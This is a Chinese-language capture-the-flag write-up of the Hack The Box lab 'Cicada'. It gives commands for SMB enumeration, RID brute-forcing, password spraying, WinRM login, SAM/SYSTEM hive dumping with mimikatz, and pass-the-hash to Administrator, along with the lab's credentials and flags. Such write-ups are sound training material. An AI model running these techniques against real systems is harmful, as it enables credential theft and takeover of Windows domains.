HTB:Cicada[WriteUP]

目录

连接至HTB服务器并启动靶机

使用nmap对靶机进行开放端口扫描

使用nmap对靶机开放端口进行脚本、服务信息扫描

首先尝试空密码连接靶机SMB服务

由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破

通过该账户连接至靶机SMB服务器提取敏感信息

使用david.orelious用户凭证登录靶机SMB服务

使用evil-winrm通过上文凭证连接到靶机WinRM服务

USER_FLAG:0c79a06b429a6c9144e52201714e6328

权限提升

尝试将注册表中的SAM、SYSTEM进行读取保存

ROOT_FLAG:b7c206ec1a5f03f4de21e622502f4005


连接至HTB服务器并启动靶机

靶机IP:10.10.11.35

分配IP:10.10.16.22


使用nmap对靶机进行开放端口扫描

nmap -p- --min-rate=1500 -sS -sU -Pn 10.10.11.35

将输出写入res.txt文件中,并提取端口号存入变量ports

ports=$(cat res.txt | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

使用nmap对靶机开放端口进行脚本、服务信息扫描

nmap -p$ports -sCV 10.10.11.35

首先尝试空密码连接靶机SMB服务

smbclient -L 10.10.11.35

列出HR共享中的所有文件

smbclient -N \\\\10.10.11.35\\HR

Notice from HR.txt文件下载到本地

get "Notice from HR.txt"

查看该文件内容

cat 'Notice from HR.txt'

密码:Cicada$M6Corpb*@Lp#nZp!8


由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破

crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep 'SidTypeUser'

将该输出保存到users.txt文件中,再将所有用户名进行提取

cat users.txt | cut -f 2 -d '\' | cut -f 1 -d ' ' | tee users.txt

使用上文拿到的密码对靶机账户进行密码喷洒

crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

由输出可见,该密码对账户michael.wrightson生效

账户:michael.wrightson

密码:Cicada$M6Corpb*@Lp#nZp!8


通过该账户连接至靶机SMB服务器提取敏感信息

crackmapexec smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

账户:david.orelious

密码:aRt$Lp#7t*VQ!3


使用david.orelious用户凭证登录靶机SMB服务

smbclient -U david.orelious //10.10.11.35/DEV

Backup_script.ps1文件下载到本地

get Backup_script.ps1

查看该文件内容

cat Backup_script.ps1

账户:emily.oscars

密码:Q!3@Lp#M6b*7t*Vt


使用evil-winrm通过上文凭证连接到靶机WinRM服务

evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

进入C盘根目录

cd C:\

查找user_flag位置

cmd.exe /c dir /s user.txt

可以看到有两个user.txt文件,两个都查看内容发现是一样的

type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"
type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"

*Evil-WinRM* PS C:\> type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"

0c79a06b429a6c9144e52201714e6328

*Evil-WinRM* PS C:\> type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"

0c79a06b429a6c9144e52201714e6328

USER_FLAG:0c79a06b429a6c9144e52201714e6328


权限提升

列出所有用户组

可以看到该用户具有文件备份特权(SeBackupPrivilege)

尝试将注册表中的SAM、SYSTEM进行读取保存

reg save hklm\sam sam
reg save hklm\system system

利用这两个注册表文件抓取靶机管理员密码

.\mimikatz.exe "lsadump::sam /sam:sam /system:system" exit

账户:Administrator

密码:2b87e7c93a3e8a0ea4a581937016f341

利用该哈希值直接通过evil-winrm登录靶机

evil-winrm -i 10.10.11.35 -H '2b87e7c93a3e8a0ea4a581937016f341' -u 'Administrator'

进入C盘根目录下

cd C:\

查找root_flag位置

cmd.exe /c dir /s root.txt

查看root_flag内容

type "C:\Users\Administrator\Desktop\root.txt"

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\

*Evil-WinRM* PS C:\> cmd.exe /c dir /s root.txt

Volume in drive C has no label.

Volume Serial Number is 1B60-8905

Directory of C:\Documents and Settings\Administrator\Desktop

10/30/2024 04:30 PM 34 root.txt

1 File(s) 34 bytes

Directory of C:\Users\Administrator\Desktop

10/30/2024 04:30 PM 34 root.txt

1 File(s) 34 bytes

Total Files Listed:

2 File(s) 68 bytes

0 Dir(s) 1,663,627,264 bytes free

*Evil-WinRM* PS C:\> type "C:\Users\Administrator\Desktop\root.txt"

b7c206ec1a5f03f4de21e622502f4005

ROOT_FLAG:b7c206ec1a5f03f4de21e622502f4005

相关推荐
中云DDoS CC防护蔡蔡4 小时前
微信小程序被攻击怎么选择高防产品
服务器·网络安全·微信小程序·小程序·ddos
.Ayang12 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang12 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
风间琉璃""14 小时前
二进制与网络安全的关系
安全·机器学习·网络安全·逆向·二进制
Che_Che_15 小时前
Cross-Inlining Binary Function Similarity Detection
人工智能·网络安全·gnn·二进制相似度检测
恃宠而骄的佩奇16 小时前
i春秋-签到题
web安全·网络安全·蓝桥杯
follycat16 小时前
信息收集--CDN绕过
网络·安全·网络安全
清风.春不晚19 小时前
shell脚本2---清风
网络·网络安全
Wh1teR0se1 天前
[极客大挑战 2019]Secret File--详细解析
前端·web安全·网络安全